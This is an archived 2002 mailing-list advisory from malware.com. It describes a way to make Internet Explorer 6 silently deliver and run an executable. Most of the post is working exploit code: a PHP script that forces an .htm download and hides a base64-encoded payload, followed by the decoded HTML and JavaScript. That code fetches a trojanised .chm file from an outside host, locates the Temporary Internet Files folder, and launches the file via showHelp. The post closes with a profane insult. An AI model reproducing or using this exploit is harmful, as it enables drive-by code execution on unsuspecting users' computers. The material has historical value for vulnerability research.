Monday, August 12, 2002 Yet another silent delivery and installation of an executable on the target computer using Internet Exlorer 6. This can be achieved by reversing the following: http://online.securityfocus.com/bid/5350 And: HTM. In order to to achieve the required results as outlined in the above, we must determine the location of the Temporary Internet File [TIF] folders. This can only be achieved if we can physically open up our file from within and read its location. Technically that can only be achieved if we have a security dialogue prompt asking us for permission. If we elect to open the file through acceptance of the security warning dialogue, it is opened from within the TIF by whatever program is associated with that file. Okay: Okay. HTM. HTM files are associated with Internet Explorer. We force our *.htm file open via a combination of server `misconfiguration` and our PHP 'package' as below: <? function malware() { header("Content-type: text/html"); header("Content-Disposition: attachment"); echo base64_decode( 'PGltZyBkeW5zcmM9Imh0dHA6Ly93d3cubWFsd2FyZS5jb20vbW'. 'Fsd2FyZS9tYWx3YXJlLmNobSIgd2lkdGg9MSBoZWlnaHQ9MT4N'. 'Cg0KPFNDUklQVD4NCg0KLy8gNy4wMi4wMiBodHRwOi8vd3d3Lm'. '1hbHdhcmUuY29tDQoNCi8vIHlvdSBtYXkgY29uc2lkZXIgd3Jp'. 'dGluZyBzZXZlcmFsIGxpbmVzDQovLyBpbiBjYXNlIG1hbHdhcm'. 'UuY2htIGFycml2ZXMgYXMgWzFdIG9yIFsyXSBldGMNCg0KZnVu'. 'Y3Rpb24gbWFsd2FyZSgpDQp7DQpzPWRvY3VtZW50LlVSTDsNCn'. 'BhdGg9cy5zdWJzdHIoLTAscy5sYXN0SW5kZXhPZigiXFwiKSk7'. 'DQpwYXRoPXVuZXNjYXBlKHBhdGgpOw0KZG9jdW1lbnQud3JpdG'. 'UoJzxGT1JNIG5hbWU9Im1hbHdhcmUiIEFDVElPTj0iamF2YXNj'. 'cmlwdDp3aW5kb3cuc2hvd0hlbHAoZG9jdW1lbnQuZm9ybXNbMF'. '0uZWxlbWVudHNbMF0udmFsdWUpIj4nKTsNCmRvY3VtZW50Lndy'. 'aXRlKCc8Zm9ybT48aW5wdXQgdHlwZT0iaGlkZGVuIiAgc2l6ZT'. '0iNDAiIG1heGxlbmd0aD0iODAiIHZhbHVlPSInK3BhdGgrJ1xc'. 'bWFsd2FyZVsxXS5jaG0iPjwvZm9ybT4nKTsNCnNldFRpbWVvdX'. 'QoJ2RvY3VtZW50Lm1hbHdhcmUuc3VibWl0KCknLDEwMDAwKTsN'. 'CiB9IA0Kc2V0VGltZW91dCgibWFsd2FyZSgpIiwyNTAwKTsgIA'. '0KPC9TQ1JJUFQ+DQogDQoNCg=='.'');} { malware(); } PHP ?> <iframe src=<? echo $PHP_SELF ?> width=1 height=1> Where our PHP 'package' contains our now run-of-the-mill scripting to determine our TIF location and our old friend the trojanised *.chm file as follows: <img dynsrc="http://www.malware.com/malware/malware.chm" width=1 height=1> <SCRIPT> // 7.02.02 http://www.malware.com function malware() { s=document.URL; path=s.substr(-0,s.lastIndexOf("")); path=unescape(path); document.write('<FORM name="malware" ACTION="javascript:window.showHelp(document.forms[0].elements [0].value)">'); document.write('<form><input type="hidden" size="40" maxlength="80" value="'+path+'malware[1].chm"></form>'); setTimeout('document.malware.submit()',10000); } setTimeout("malware()",2500); </SCRIPT> note: file path for *.chm must be long as we are now operating off the server and from within the TIF What this does is generate the default security warning for *.htm flles: [screen shot: http://www.malware.com/malwarez.png 7KB] Should we elect to open it, we are once again able to determine our TIF location where our *.chm is now residing too and fire our scripting to locate and call it. [screen shot: http://www.malware.com/zerawlam.png 7KB] Notes: 1. As indicated this is the reverse for : http://online.securityfocus.com/bid/5350 . In this instance the default is the security warning which should be disengaged to allow this to fail. 2 Tested series of win98 machines, Internet Explorer 6.0.2600 and all of its bandages 4. We anxiously await the release of Internet Explorer 6 SP1. Special Note: would the gang of Nigerians who have taken up squatting on these security mailing lists and who feel it is necessary to continuously request our assistance with their multiple millions of dollars every day, kindly fuck off and die. Thank you. End Call -- http://www.malware.com
This archive was generated by hypermail 2b30 : Tue Aug 13 2002 - 07:01:09 PDT
